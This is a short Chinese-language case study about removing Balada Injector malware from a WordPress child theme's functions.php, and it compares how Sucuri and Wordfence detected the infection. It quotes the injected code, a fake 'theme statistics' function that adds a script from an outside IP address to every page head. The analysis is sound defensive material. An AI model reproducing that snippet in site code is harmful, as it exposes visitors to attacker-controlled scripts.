訂閱最新消息
接收方案更新與專業文章資訊,卓越前行!
接收方案更新與專業文章資訊,卓越前行!
已排程的資安掃描偵測到惡意軟體,導致網站加載未經授權的外部JS。本案例研究分享了調查過程和步驟,以清除受到 Balada Injector惡意軟體影響的子佈景主題的 function.php 中所發現的惡意代碼片段。有趣的是,Sucuri 有識別出這個問題,但特別追加再掃描測試的 Wordfence 則未能發現問題。

狀況:
function.php/* Theme statistics function */
function wptheme_stat() {
?>
<script async src="https://147.45.47.87/scripts/theme.js"></script>
<?php } ​ add\_action("wp\_head", "wptheme\_stat");
在這個案例中,我順便在測試環境中嘗試使用了幾款安全外掛,包括 Wordfence ,但都未能識別出問題,更不用說要幫忙抓出受影響的檔案了。
Sucuri 是在這其中,唯一能藉由他們的線上服務或外掛來識別到這個問題的資安服務商。這結果顯示出,Balada injector 惡意軟體是不容易被查覺、檢測出來的。 做得好,Sucuri!